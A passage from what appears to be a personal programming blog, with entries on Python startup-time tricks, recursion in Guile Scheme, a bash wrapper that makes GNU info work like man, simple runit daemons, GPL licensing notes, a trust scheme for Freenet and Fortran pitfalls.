PS: I write so strongly here, because I actually like the tests from Phoronix a lot. I think we need rather more than less testing and their testsuite actually seems to do a good job - when given the right parameters - so seeing Phoronix distorting the tests to a point where they become almost useless (except as political tool against GCC) is a huge disappointment to me.


  1. Josh Klint from Leadwerks confirmed that Phoronix misrepresented his post and wrote a followup-post: » @ArneBab That really wasn't meant to be controversial. I was hoping to provide constructive feedback from the view of an Xcode / VS user.« » Slightly surprised my complaints about GDB are a hot topic. I can make just as many criticisms of other compilers and IDEs.« » The first 24 hours are the best for usability feedback. I figure if they notice a pattern some of those things will be improved.« » GDB Follwup «@Leadwerks, 2:04 AM - 11 Nov 13, 2:10 AM - 11 Nov 13 and @JoshKlint, 2:07 AM - 11 Nov 13, 8:48 PM - 11 Nov 13

  2. The first-impression criticism from Josh Klint was addressed by a Phoronix reader by pointing to the frame command. I do not blame Josh for not knowing all tricks: He wrote a fair account of his initial experience with GDB (and he said later that he wrote the post after less than 24 hours of using GDB, because he considers that the best time to provide feedback) and his experience can serve as constructive criticism to improve tutorials, documentation and the UI of GDB. Sadly his visibility and the possible impact of his work on free software made it possible for Phoronix to abuse a personal report as support for a general badmouthing of the tool. In contrast the full message of Josh Klint ended really positive: Although some annoyances and limitations have been discovered, overall I have found Linux to be a completely viable platform for application development. — Josh Klint, Leadwerks 

  3. I know that rigging of tests is a strong claim. The actions of Michael Larabel deserve being called rigging for three main reasons: (1) Including compile-time data along with runtime performance without clear distinction between both, even though compile-time of the full code is mostly irrelevant when you use a proper build system and compile time and runtime are completely different classes of results, (2) including pointless tests between incomparable setups whose only use is to relativate any weakness of his favorite system and (3) blatantly lying in the summaries (as I show in this article). 

Python for beginning programmers

(written on ohloh for Python)

Since we already have two good reviews from experienced programmers, I'll focus on the area I know about: Python as first language.

My experience:

  • I began to get into coding only a short time ago. I already knew about processes in programs, but not how to get them into code.
  • I wanted to learn C/C++ and failed at general structure. After a while I could do it, but it didn't feel right.
  • I tried my luck with Java and didn't quite get going.
  • Then I tried Python, and got in at once.

Advantages of Python:

  • The structure of programs can be understood easily.
  • The Python interpreter lets you experiment very quickly.
  • You can realize complex programs, but Python also allows for quick and simple scripting.
  • Code written by others is extremely readable.
  • And coding just flows - almost like natural speaking/thinking.

How it looks:

def hello(user):
    print("Hello " + user + "!")
hello("Fan")
# prints Hello Fan! on screen

As a bonus, there is the great open book How to Think Like a Computer Scientist, which teaches Python and is used for teaching Python and programming at universities.

So I can wholeheartedly recommend Python to beginners in programming, and as the other reviews on Ohloh show, it is also a great language for experienced programmers and seems to be a good language to accompany you in your whole coding life.

PS: Yes, I know about the double meaning of "first language" :)

Recursion wins!

I recently read The Little Schemer, and that got me thinking about recursion and loops.

Having started my programming life with Python, I normally use for-loops to solve problems. But they are actually an inferior mechanism compared to recursion, if (and only if) the language provides proper syntactic support for recursion. Since that claim pretty much damns Python on a theoretical level (even though it is still a very good tool in practice and I still love it!), I want to share a simplified version of the code which made me realize this.

Let’s begin with how I would write that code in Python.

res = ""
instring = False
for letter in text:
    if letter == "\"":
        # special conditions for string handling go here
        # lots of special conditions
        # and more special conditions
        # which cannot easily be moved out, 
        # because we cannot skip multiple letters
        # in one step
        instring = not instring
    if instring:
        res += letter
        continue
    # other cases

Did you spot the comment “special conditions go here”? That’s the point which damns for-loops: You cannot easily factor out these special conditions.1 In this example all the complexity is in the variable instring. But depending on the usecase, this could require lots of different states being tracked within the loop and cluttering up the namespace as well as entangling complexity from different parts of the loop.

This is how the same could be done with proper let-recursion:

; first get SRFI-71: multi-value let for syntactic support for what I
; want to do
use-modules : srfi srfi-71

let process-text
    : res ""
      letter : string-take text 1
      unprocessed : string-drop text 1
    when : equal? letter "\""
           let-values 
               ; all the complexity of string-handling is neatly
               ; confined in the helper-function consume-string
               : (to-res next-letter still-unprocessed) : consume-string unprocessed
               process-text
                   string-append res to-res
                   . next-letter
                   . still-unprocessed
    ; other cases

The basic code for recursion is a bit longer, because the new values in the next step of the processing are given explicitly. But it is almost trivial to shell out parts of the loop to another function. It just needs to return the next state of the recursion.

And that’s what consume-string does:

define : consume-string text
    let
        : res ""
          next-letter : string-take text 1
          unprocessed : string-drop text 1
        ; lots of special handling here
        values res next-letter unprocessed

To recite from the Zen of Python:

Explicit is better than implicit.

It’s funny to see how Guile Scheme allows me to follow that principle more thoroughly than Python.

(I love Python, but this is a case where Scheme simply wins - and I’m not afraid to admit that)

PS: Actually I found this technique when thinking about use-cases for multiple return-values of functions.

PPS: This example uses wisp-syntax for the scheme-examples to avoid killing Pythonistas with parens.


  1. While you cannot factor out parts of for loops easily, functions which pass around iterators get pretty close to the expressivity of tail recursion. They might even go a bit further and I already missed them for some scheme code where I needed to generate expressions step by step from a function which always returned an unspecified number of expressions per call. If Python continues to make it easier to use iterators, they could reduce the impact of the points I make in this article. 
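To make the iterator idea from footnote 1 concrete, here is a small sketch (my own illustration, not code from the article): a helper consumes letters from the shared iterator, so the string handling stays out of the main loop.

def consume_string(letters):
    """Consume letters from the shared iterator up to the closing quote."""
    res = []
    for letter in letters:
        if letter == "\"":
            break
        res.append(letter)
    return "".join(res)

def process_text(text):
    res = []
    letters = iter(text)
    for letter in letters:
        if letter == "\"":
            # the helper advances the same iterator, so the outer loop
            # never sees the letters inside the string
            res.append(consume_string(letters))
            continue
        # other cases
        res.append(letter)
    return "".join(res)

print(process_text('say "hello" now'))  # prints: say hello now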

AttachmentSize
2014-03-05-Mi-recursion-wins.org3.36 KB

Reducing the Python startup time

The Python startup time always nagged me (17-30ms), and I just searched again for a way to reduce it when I found this:

The Python-Launcher caches GTK imports and forks new processes to reduce the startup time of python GUI programs.

Python-launcher does not solve my problem directly, but it points into an interesting direction: If you create a small daemon which you can contact via the shell to fork a new instance, you might be able to get rid of your startup time.

To get an example of the possibilities, download the python-launcher and socat and do the following:

PYTHONPATH="../lib.linux-x86_64-2.7/" python python-launcher-daemon &
echo pass > 1
for i in {1..100}; do 
    echo 1 | socat STDIN UNIX-CONNECT:/tmp/python-launcher-daemon.socket & 
done

Todo: Adapt it to a given program and remove the GTK stuff. Note the & at the end: Closing the socket connection seems to be slow, so I just don’t wait for socat to finish. Breaks at somewhere over 200 simultaneous connections. Option: Use a datagram socket instead.

The essential trick is to just create a server which opens a socket. Then it reads all the data from the socket. Once it has the data, it forks like the following:

        pid = os.fork()
        if pid:
            return

        signal.signal(signal.SIGPIPE, signal.SIG_DFL)
        signal.signal(signal.SIGCHLD, signal.SIG_DFL)

        glob = dict(__name__="__main__")
        print 'launching', program
        execfile(program, glob, glob)

        raise SystemExit
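For context, here is a self-contained sketch of the whole idea (my own minimal version, not the actual python-launcher code; the socket path is made up): a small server listens on a Unix socket, reads a script path and runs it in a forked child, so the interpreter startup cost is paid only once.

#!/usr/bin/env python3
# Minimal sketch of such a launcher daemon (illustration only).
import os
import signal
import socket

SOCKET_PATH = "/tmp/minimal-launcher.socket"  # hypothetical path

def serve():
    # let the kernel reap finished children so they do not become zombies
    signal.signal(signal.SIGCHLD, signal.SIG_IGN)
    if os.path.exists(SOCKET_PATH):
        os.remove(SOCKET_PATH)
    server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    server.bind(SOCKET_PATH)
    server.listen(5)
    while True:
        connection, _ = server.accept()
        with connection:
            program = connection.recv(4096).decode().strip()
        if not program:
            continue
        if os.fork():
            continue  # parent: go back to serving
        # child: restore default signal handlers and run the script
        signal.signal(signal.SIGPIPE, signal.SIG_DFL)
        signal.signal(signal.SIGCHLD, signal.SIG_DFL)
        namespace = dict(__name__="__main__")
        with open(program) as script:
            exec(compile(script.read(), program, "exec"), namespace)
        raise SystemExit

if __name__ == "__main__":
    serve()

A client then just writes the path of the script into the socket, for example with socat as shown above.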

Running a program that way 100 times took just 0.23 seconds for me, so the Python startup time of 17ms got reduced to 2.3ms.

You might have to switch from forking to just executing the code in the daemon process if you want to be even faster and the code snippets are small. For example, when running the same test without the fork and the signals, 100 executions of the same code took just 0.09s, cutting down the startup time to an impressive 0.9ms - at the cost of no longer running in parallel.

(That’s what I also do with emacsclient… My emacs takes ~30s to start (due to excessive use of additional libraries I added), but emacsclient -c shows up almost instantly.)

I tested the speed by just sending a file with the following snippet to the server:

import time
with open("2", "a") as f:
    f.write(str(time.time()) + "\n")

Note: If your script only needs the included python libraries (batteries) and no custom-installed libs, you can also reduce the startup time by avoiding site initialization:

python -S [script]

Without -S python -c '' takes 0.018s for me. With -S I am down to

time python -S -c '' → 0.004s. 

Note that you might miss some installed packages that way. This is slower than the daemon method by up to factor 4 (4ms instead of 0.9), but still faster than the default way. Note that cold disk buffers can make the difference much bigger on the first run which is not relevant in this case but very much relevant in general for the impression of startup speed.

PS: I attached the python-launcher 0.1.0 in case its website goes down. License: GPL and MIT; included. This message was originally written at stackoverflow.

AttachmentSize
python-launcher-0.1.0.tar.gz11.11 KB

Relicensing a project from GPLv2 or later to AGPLv3 or later

Switching from GPLv2 or later to AGPL is perfectly legal. But if it is not your own project, it is often considered rude.

This does not relicense the original code; it just sets the license of new code and of the project as a whole. The old code stays GPLv2+, but when it is combined with the new code under AGPLv3 (or later), the combined project will be under AGPLv3 (or later).

However, switching from GPLv2+ to AGPLv3(+) without the consensus of all other contributors is considered rude, because it could prevent some of the original authors from using future versions of the project. Their professional use of the project might depend on the loopholes in the copyleft of the GPL.

And the ones you will want most of all as users of your fork of a mostly discontinued project are the original authors, because that can mend the split between the two versions.

This question came up in a continuation of a widely used package whose development seemed to have stalled. The discussion was unfocused, so I decided to write succinct information for all who might find themselves in a similar situation. I will not link to them, because I do not wish to re-ignite the discussion through an influx of rehashed arguments.

Replacing man with info

GNU info is light-years ahead of man in terms of features, with sub-pages, clickable links, topic-spanning search, clean HTML and LaTeX export and efficient interactive navigation.

But man pages are still the de-facto standard for getting quick information on a GNU/Linux system.

This guide intends to help you change that for your system. It needs GNU texinfo >= 6.1.

Update: If you prefer vi-keys, adjust the function below to call info --vi-keys instead of plain info. You could then call that function iv.

1 Advantages of man-pages over pristine info

I see strong reasons for sticking to man pages instead of info: man pages provide what most people need right away (how to use this?) and they fail fast if the topic is not available.

Their advanced features are mostly hidden away (e.g. checking the Linux programmer's manual instead of the installed programs: man 2 stat vs. man stat).

In contrast, the default error state of info is to show you all the other info nodes, in which you are really not interested at the moment. And man basename gives you the commandline invocation of the basename utility, while info basename gives you libc "5.8 Finding Tokens in a String".

Also, man is fast and works on most terminals, while info fails on dumb ones.

In short: man does what most users need right now, and if it can’t do that, it simply fails, so the user can try something else. That’s a huge UI advantage, but not due to an inherent limitation of GNU info. GNU Info can do the same, and even defer to man pages for stuff for which there is no info document. It just does not provide that conveniently by default.

2 Fixing GNU info with a simple bash function

GNU Info can provide the same useful interface as man. So let’s make it do that.

To keep all flexibility without needing to adjust the PATH, let’s make a bash function. That function can go into ~/.bashrc, or /etc/bash/bashrc.1 I chose the latter, because it provides the function for all accounts on the system and keeps it separate from the general setup.

The function will be called i: To get information about any thing, just call i thing.

Let’s implement that:

function i()
{
    INFOVERSIONLINE=$(info --version | head -n 1)
    INFOVERSION="${INFOVERSIONLINE##* }"
    INFOGT5=$(if test ${INFOVERSION%%.*} -gt 5; then echo true; else echo false; fi)
    # start with special cases which are quick to check for
    if test $# -lt 1; then
        # show info help notice
        info --help
    elif test $# -gt 1 && ! echo $1 | grep -q "[0-9]"; then
        # user sent complex request, but not with a section command. Just use info
        info "$@"
    elif test $# -gt 1 && echo $1 | grep -q "[0-9]"; then
        # user sent request for a section from the man pages, we must defer to man
        man "$@"
    elif test x"$1" = x"info"; then
        # for old versions of info, calling info --usage info fails to
        # provide info about calling info
        if test x"$INFOGT5" = x"true"; then
            info --usage info
        else
            info --usage -f info-stnd
        fi
    elif test x"$1" = x"man"; then
        # info --all -w ./man fails to find the man man page
        info man
    else
        # start with a fast but incomplete info lookup
        INFOPAGELOCATION="$(info --all -w ./"$@" | head -n 1)"
        INFOPAGELOCATION_PAGENAME="$(info --all -w "$1".info | head -n 1)"
        INFOPAGELOCATION_COREUTILS="$(info -w coreutils -n "$@")"
        # check for usage from fast info, if that fails check man and
        # if that also fails, just get the regular info page.
        if test x"${INFOPAGELOCATION}" = x"*manpages*" || test x"${INFOPAGELOCATION}" != x""; then
           info "$@"; # use info to read the known page, man or info
        elif test x"${INFOPAGELOCATION_COREUTILS}" != "x" && info -f "${INFOPAGELOCATION_COREUTILS}" -n "$@" | head -n 1 | grep -q -i "$@"; then
            # coreutils utility
            info -f "${INFOPAGELOCATION_COREUTILS}" -n "$@"
        elif test x"${INFOPAGELOCATION}" = x"" && test x"${INFOPAGELOCATION_PAGENAME}" = x""; then
           # unknown to quick search, try slow search or defer to man.
           # TODO: it would be nice if I could avoid this double search.
           if test x"$(info -w "$@")" = x"*manpages*"; then
               info "$@"
           else
               # defer to man, on error search for alternatives
               man "$@" || (echo nothing found, searching info ... && \
                            while echo $1 | grep -q '^[0-9]$'; do shift; done && \
                            info -k "$@" && false)
           fi
        elif test x"${INFOPAGELOCATION_PAGENAME}" != x""; then
             # search for alternatives (but avoid numbers)
           info --usage -f "${INFOPAGELOCATION_PAGENAME}" 2>/dev/null || man "$@" ||\
             (echo searching info &&\
              while echo $1 | grep -q '^[0-9]$'; do shift; done && \
              info -k "$@" && false)            
        else # try to get usage instructions, then try man, then
             # search for alternatives (but avoid numbers)
           info --usage -f "${INFOPAGELOCATION}" 2>/dev/null || man "$@" ||\
             (echo searching info &&\
              while echo $1 | grep -q '^[0-9]$'; do shift; done && \
              info -k "$@" && false)
        fi
        # ensure that unsuccessful requests report an error status
        INFORETURNVALUE=$?
        unset INFOPAGELOCATION
        unset INFOPAGELOCATION_COREUTILS
        if test ${INFORETURNVALUE} -eq 0; then
            unset INFORETURNVALUE
            return 0
        else
            unset INFORETURNVALUE
            return 1
        fi
    fi
}

3 Examples

Let’s see what that gives us.

3.1 First check: Getting info on info:

i info | head
echo ...
Next: Cursor Commands,  Prev: Stand-alone Info,  Up: Top

2 Invoking Info
***************

GNU Info accepts several options to control the initial node or nodes
being viewed, and to specify which directories to search for Info files.
Here is a template showing an invocation of GNU Info from the shell:

     info [OPTION...] [MANUAL] [MENU-OR-INDEX-ITEM...]
...

3.2 Second check: Some random GNU command

i grep | head | sed 's/\[[0-9]*m//g' # stripping simple colors
echo ...
Next: Regular Expressions,  Prev: Introduction,  Up: Top

2 Invoking ‘grep’
*****************

The general synopsis of the ‘grep’ command line is

     grep OPTIONS PATTERN INPUT_FILE_NAMES

There can be zero or more OPTIONS.  PATTERN will only be seen as such
...

Note: If there’s a menu at the bottom, you can jump right to its entries by hitting the m key.

3.3 Utility which also exists as libc function

Checking for i stat gives us the stat command:

i stat | head
Next: sync invocation,  Prev: du invocation,  Up: Disk usage

14.3 ‘stat’: Report file or file system status
==============================================

‘stat’ displays information about the specified file(s).  Synopsis:

     stat [OPTION]… [FILE]…

   With no option, ‘stat’ reports all information about the given files.

…while checking for i libc stat gives us the libc function:

i libc stat | head
Next: Testing File Type,  Prev: Attribute Meanings,  Up: File Attributes

14.9.2 Reading the Attributes of a File
---------------------------------------

To examine the attributes of files, use the functions 'stat', 'fstat'
and 'lstat'.  They return the attribute information in a 'struct stat'
object.  All three functions are declared in the header file
'sys/stat.h'.

3.4 Something which only has a man-page

i man cleanly calls info man.

i man | head | sed "s,\x1B\[[0-9;]*[a-zA-Z],,g" # stripping colors
man(1)                      General Commands Manual                     man(1)



NAME
       man  -  Formatieren  und Anzeigen von Seiten des Online-Handbuches (man
       pages)
       manpath - Anzeigen  des  Benutzer-eigenen  Suchpfades  für  Seiten  des
       Online-Handbuches (man pages)

3.5 A request for a man page section

i 2 stat cleanly defers to man 2 stat

i 2 stat | head | sed "s,\x1B\[[0-9;]*[a-zA-Z],,g" # stripping colors
STAT(2)                    Linux Programmer's Manual                   STAT(2)



NAME
       stat, fstat, lstat, fstatat - get file status

SYNOPSIS
       #include <sys/types.h>
       #include <sys/stat.h>

3.6 Something unknown

In case there is no info directly available, do a keyword search and propose sources.

i em | head
echo ...
nothing found, searching info ...
"(emacspeak)Speech System" -- speech system
"(cpio)Copy-pass mode" -- copy files between filesystems
"(tar)Basic tar" -- create, complementary notes
"(tar)problems with exclude" -- exclude, potential problems with
"(tar)Basic tar" -- extract, complementary notes
"(tar)Incremental Dumps" -- extract, using with --listed-incremental
"(tar)Option Summary" -- incremental, summary
"(tar)Incremental Dumps" -- incremental, using with --list
"(tar)Incremental Dumps" -- list, using with --incremental
...

4 Summary

i thing gives you info on some thing. It makes using info just as convenient as using man.

Its usage even beats man in convenience, since it defers to man if needed, offers alternatives and provides named categories instead of having to remember the handbook numbers to find the right function.

And as developer you can use texinfo to provide high quality documentation in many formats. You can even include a comprehensive tutorial in your documentation while still enabling your users to quickly reach the information they need.

We had this all along, except for a few nasty roadblocks. Here I did my best to eliminate these roadblocks.

Footnotes:

1

Or it can go into /etc/bash/bashrc.d/info.sh (if you have a bashrc directory). That is the cleanest option.

AttachmentSize
2016-09-12-Mo-replacing-man-with-info.org10.46 KB

Screencast: Tabbing of everything in KDE

I just discovered tabbing of everything in KDE:

(download)

Created with recordmydesktop, cut with kdenlive, encoded to ogg theora with ffmpeg2theora (encoding command).

Music: Beat into Submission on Public Domain by Tryad.

To embed the video on your own site you can simply use:

<video 
src="http://draketo.de/files/screencast-tabbing-everywhere-kde.ogv"
controls=controls>
</video>

If you do so, please provide a backlink here.

License: cc by-sa, because that’s the license of the song. If you omit the audio, you can also use one of my usual free licenses (or all of them, including the GPL). Here’s the raw recording (=video source).

¹: Feel free to upload the video to youtube or similar. I license my stuff under free licenses to make it easy for everyone to use, change and spread them.

²: Others have shown this before, but I don’t mind that. I just love the feature, so I want to show it :)

³: The command wheel I use for calling programs is the pyRad.

AttachmentSize
screencast-tabbing-everywhere-kde.ogv10.75 MB

Simple daemon with start-stop-daemon and runit

PDF

PDF (to print)

Org (source)

Creating a daemon with almost zero effort.

start-stop-daemon

The example with the start-stop-daemon uses Gentoo OpenRC as root.

The simplest daemon we can create is a while loop:

echo '#!/bin/sh' > whiledaemon.sh
echo 'while true; do true; done' >> whiledaemon.sh
chmod +x whiledaemon.sh

Now we start it as daemon

start-stop-daemon --pidfile whiledaemon.pid \
--make-pidfile --background ./whiledaemon.sh

Top shows that it is running:

top | grep whiledaemon.sh

We stop it using the pidfile:

start-stop-daemon --pidfile whiledaemon.pid \
--stop ./whiledaemon.sh

That’s it.

Hint: To add cgroups support on a Gentoo install, open /etc/rc.conf and uncomment

rc_controller_cgroups="YES"

Then in the initscript you can set the other variables described below that line. Thanks for this hint goes to Luca Barbato!

If you want to ensure that the daemon keeps running without checking a PID file (which might in some corner cases fail because a new process claims the same PID), we can use runsvdir from runit.

daemon with runit

Minimal examples for runit daemons - first as unprivileged user, then as root.

runit as simple user

Create a script which dies

printf '#!/usr/bin/env python\nfor i in range(100): a = i*i\n' >/tmp/foo.py
chmod +x /tmp/foo.py

Create the daemon folder

mkdir -p ~/.local/run/runit_services/python
ln -sf /tmp/foo.py ~/.local/run/runit_services/python/run

Run the daemon via runsvdir

runsvdir ~/.local/run/runit_services

Manage it with sv (part of runit)

# stop the running daemon
SVDIR=~/.local/run/runit_services/ sv stop python
# start the service (it shows as `run` in top)
SVDIR=~/.local/run/runit_services/ sv start python

runit as root

Minimal working example for setting up runit as root - like a sysadmin might do it.

printf '#!/usr/bin/env python\nfor i in range(100): a = i*i\n' >/tmp/foo.py &&
    chmod +x /tmp/foo.py &&
    mkdir -p /run/arne_service/python &&
    printf '#!/bin/sh\nexec /tmp/foo.py' >/run/arne_service/python/run &&
    chmod +x /run/arne_service/python/run &&
    chown -R arne /run/arne_service &&
    su - arne -c 'runsvdir /run/arne_service'

Or without bash indirection (giving up some flexibility we don’t need here)

printf '#!/usr/bin/env python\nfor i in range(100): a = i*i\n' >/tmp/foo.py &&
    chmod +x /tmp/foo.py &&
    mkdir -p /run/arne_service/python &&
    ln -s /tmp/foo.py /run/arne_service/python/run &&
    chown -R arne /run/arne_service &&
    su - arne -c 'runsvdir /run/arne_service'
AttachmentSize
2015-04-15-Mi-simple-daemon-openrc.org2.92 KB
2015-04-15-Mi-simple-daemon-openrc.pdf152.99 KB

Simple positive trust scheme with thresholds

Update: I nowadays think that voting down is useful, but only for protection against spam and intentional disruption of communication. Essentially a distributed function to report spam.

The rest of this article is written for freetalk inside freenet, and is also posted there with my non-anonymous ID.

I don’t see a reason for negative reputation schemes — voting down is in my view a flawed concept. It just allows for community censorship, which I see as incompatible with the goals of freenet.

Would it be possible to change that to use only positive votes and a threshold?

  • If I like what some people write, I give them positive votes.
  • If I get too much spam, I increase the threshold for all people.
  • Effective positive votes get added. It suffices that some people I trust also trust someone else and I’ll see the messages.
  • Effective trust is my trust (0..1) · the trust of the next in the chain (0..1) · …

Usecase:

  • Zwister trusts Alice and Bob.
  • Alice trusts Lilith.
  • Bob hates Lilith.

In the current scheme (as I understand it), zwister wouldn’t see posts from Lilith.

In a pure positive scheme, zwister would see the posts. If zwister wants to avoid seeing the posts from Lilith, he has to untrust Alice or ask Alice to untrust Lilith. Add to that a personal (and not propagating) blocking option which allows me to “never see anything from Lilith again”.

Bob should not be able to interfere with me seeing the messages from Lilith, when Alice trusts Lilith.

If zwister's trust for Alice (0..1) multiplied with Alice's trust for Lilith (0..1) is lower than zwister's threshold, zwister doesn’t see the messages.
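As a small sketch of that calculation (my own illustration, not Freetalk code): effective trust along a chain is the product of the direct trust values, and a message is shown when any chain reaches the reader’s threshold.

def effective_trust(chain):
    """chain: list of direct trust values in (0..1) along one path."""
    trust = 1.0
    for t in chain:
        trust *= t
    return trust

def visible(chains, threshold):
    """Show a message if any trust chain reaches the threshold."""
    return any(effective_trust(chain) >= threshold for chain in chains)

# Usecase: zwister -> Alice (0.8), Alice -> Lilith (0.9)
print(visible([[0.8, 0.9]], threshold=0.5))  # True: zwister sees Lilith's posts
print(visible([[0.8, 0.9]], threshold=0.8))  # False: below zwister's threshold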

PS: somehow adapted from Credence, which would have brought community spam control to Gnutella, if Limewire had adopted it.

PPS: And an adaptation for news voting: You give positive votes on news which show up. Negative votes assign a private threshold to the author of the news, so you then only see news from that author which enough people vote for.

Simple steps to attach the GNU Public License (GPL) to your project

Here are the simple steps to attach a GPL license to your source files (written after requests by DiggClone and Bandnet):

For your own project, just add the following text-notice to the header/first section of each of your source-files, commented out in whatever way your language uses:

----------------following is the notice-----------------
/*
* Your Project Name - -you slogan-
* Copyright (C) 2007 - 2007 Your Name
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
----------------------------------------------
the "2007 - 2007" needs to be adjusted to "year when you gave it the license in the first place" - "current year".

Then put the file gpl.txt into the source-folder or a docs folder: http://www.gnu.org/licenses/gpl.txt

If you are developing together with other people, you need their permission to put the project under the GPL.

------

Just for additional info, I found this license comparison paper by Sun: http://mediacast.sun.com/share/webmink/SunLicensingWhitePaper042006.pdf

And comments to it: http://blogs.sun.com/webmink/entry/open_source_licensing_paper#comments

It does look nice, but it misses one point:

GPL is trust: Contributors can trust, that their contributions will keep helping the community, and that the software they contribute to will keep being accessible for the community.

(That's why I decided some years ago to only support GPL projects. My contributions to one semi-closed project got lost, because the project wasn't free and the developer just decided not to offer them anymore, and I could only watch hundreds of hours of work disappear, and that hurt.)

Best wishes,
Arne
PS: If anything's missing, please write a comment!

Some Python Programs of mine

heavily outdated page. See bitbucket.org/ArneBab for many more projects…

Hi,

I created some projects with pyglet and some tools to facilitate 2D
game development (for me), and I thought you might be interested.

  • babglet: basic usage of pyglet for 2D games with optional collision
    detection and avoidance.
  • blob_swarm: a swarm of blobs with emerging swarm behaviour through only pair relations.
  • blob_battle: a duel-style battle between two blobs (basic graphics,
    control and movement done)
  • fuzzy_collisions: 2 groups of blobs. One can be controlled. When two
    blobs collide, they move away a (random) bit to avoid the collision.

They are available from the rpg-1d6 project on sourceforge:
-> https://sf.net/projects/rpg-1d6/

The download can be found at the sf.net download page:
-> https://sourceforge.net/project/showfiles.php?group_id=199744

Strengths and weaknesses of Python

a reply I wrote on quora.

Python is easy to learn and low ceremony. Both are pretty hard targets to hit. It also has great libraries for scientific work, for system scripting and for web development — and for most everything else. And it is pragmatic in a sense: It gets stuff done, and in a way which others can typically understand easily, which is an even harder target to hit, especially with low-ceremony languages. If you look for reasons, import this aka PEP 20 -- The Zen of Python is a good start.

Python has rightfully been called “Pseudocode which actually runs”. There’s often no need for pseudocode if you can show some Python.

However, it has its weaknesses. Many here already talked about performance. I won’t go there, because you can fix most of that with cython, pypy and time (as the JavaScript engines in browsers show, which often reach 50% of the speed of optimized C). What irks me are some limitations in its syntax which I began to hit more and more about two years ago.

List comprehensions make actual code more complicated than simple examples, because you have kind of a dual syntax to it. And there is some ceremony in tools which were added later. For example this is the template I nowadays use to start a Python project: a minimal Python script — this could be part of the language so that I would not even need to put it into the script. But this is not how history works: It cannot break backwards compatibility (a fate which hits all useful and widespread programming languages). Also things like having to spell out the underscore names feel more and more strange to me. Therefore I started into Guile Scheme to see how different programming could be if I shed the constraints of Python. You can read my journey in py2guile: Going from Python to Guile Scheme - a natural progression (a free ebook).
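To make the ceremony point concrete, here is a small sketch of such a minimal starting script (my own illustration, not necessarily the template linked above):

#!/usr/bin/env python3
"""Example tool: greet someone from the command line."""

import argparse


def parse_args():
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument("name", nargs="?", default="World",
                        help="who to greet")
    return parser.parse_args()


def main():
    args = parse_args()
    print("Hello " + args.name + "!")


if __name__ == "__main__":
    main()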

Also see my other Python-articles on this site.

Surprising behaviour of Fortran (90/95)

1 Introduction

I recently started really learning Fortran (as opposed to just dabbling with existing code until it did what I wanted it to).

Here I document the surprises I found along the way.

If you want a quick start into Fortran, I’d suggest to begin with the tutorial Writing a commandline tool in Fortran and then to come back here to get the corner cases right.

As reference: I come from Python, C++ and Lisp, and I actually started to like Fortran while learning it. So the horror-stories I heard while studying were mostly proven wrong. I uploaded the complete code as base60.f90.

2 Testing Skeleton

This is a code sample for calculating a base60 value from an integer.

The surprises are taken out of the program and marked with double angle brackets («surprise»). They are documented in the chapter Surprises.

program base60
  ! first step: Base60 encode. 
  ! reference: http://faruk.akgul.org/blog/tantek-celiks-newbase60-in-python-and-java/
  ! 5000 should be 1PL
  implicit none
  <<declare-function-type-program>>
  <<function-test-calls>>
end program base60
<<declare-function-type-function>>
  implicit none
  !!! preparation
  <<unchanged-argument>>
  <<parameter>>
  ! work variables
  integer :: n = 0
  integer :: remainder = 0
  ! result
  <<variable-declare-init>>
  ! actual algorithm
  if (number == 0) then
     <<return>>
  end if
  ! calculate the base60 string
  <<variable-reset>>
  n = number ! the input argument: that should be safe to use.
  ! catch number = 0
  do while(n > 0)
     remainder = mod(n, 60)
     n = n/60
     <<indizes-start-at-1>>
     ! write(*,*) number, remainder, n
  end do
<<return-end>>

2.1 Helpers

write(*,*) 0, trim(numtosxg(0))
write(*,*) 100000, trim(numtosxg(100000))
write(*,*) 1, trim(numtosxg(1))
write(*,*) 2, trim(numtosxg(2))
write(*,*) 60, trim(numtosxg(60))
write(*,*) 59, trim(numtosxg(59))

3 Surprises

3.1 I have to declare the return type of a function in the main program and in the function

! I have to declare the return type of the function in the main program, too.
character(len=1000) :: numtosxg
character(len=1000) function numtosxg( number )

Alternatively to declaring the function in its header, I can also declare its return type in the declaration block inside the function body:

function numtosxg (number)
  character(len=1000) :: numtosxg
end function numtosxg

3.2 Variables in Functions accumulate over several function calls

This even happens when I initialize the variable at declaration:

character(len=1000) :: res = ""

Due to that, I have to begin the algorithm by resetting the required variable.

res = " " ! I have to explicitely set res to " ", otherwise it
          ! accumulates the prior results!

This provides a hint that initialization in a declaration inside a function is purely compile-time.

program accumulate
  implicit none
  integer :: acc
  write(*,*) acc(), acc(), acc() ! prints 1 2 3
end program accumulate

integer function acc()
  implicit none
  integer :: ac = 0
  ac = ac + 1
  acc = ac
end function acc

With explicit assignment inside the function body, on the other hand, the variable is reset on every call:

program accumulate
  implicit none
  integer :: acc
  write(*,*) acc(), acc(), acc() ! prints 1 1 1
end program accumulate

integer function acc()
  implicit none
  integer :: ac
  ac = 0
  ac = ac + 1
  acc = ac
end function acc

3.3 parameter vs. intent(in)

Defining a variable as parameter gives a constant, not an unchanged function argument:

! constants: marked as parameter: not function parameters, but
! algorithm parameters!
character(len=61), parameter :: base60chars = "0123456789"&
     //"ABCDEFGHJKLMNPQRSTUVWXYZ_abcdefghijkmnopqrstuvwxyz"

An argument the function is not allowed to change is defined via intent(in):

! input: ensure that this is purely used as input.
! intent is only useful for function arguments.
integer, intent(in) :: number

3.4 To return values from functions, assign the value to the function itself

This feels surprisingly obvious, but it was surprising to me nonetheless.

numtosxg = "0"
return

The return statement is only needed when returning early from a function. At the end of the function it is implied.

  numtosxg = res
end function numtosxg

3.5 Fortran array indices start at 1 - and are inclusive

For an algorithm like the example base60, where 0 is identified by the first character of a string, this requires adding 1 to the index.

! note that fortran indizes start at 1, not at 0.
res = base60chars(remainder+1:remainder+1)//trim(res)

Also note that the indices are inclusive. The following actually gets the single letter at index n+1:

base60chars(n+1:n+1)

In Python, on the other hand, the second index of a slice is exclusive, so to get the same result you would use [n:n+1]:

pythonarray[n:n+1]

3.6 I have to trim strings when concatenating

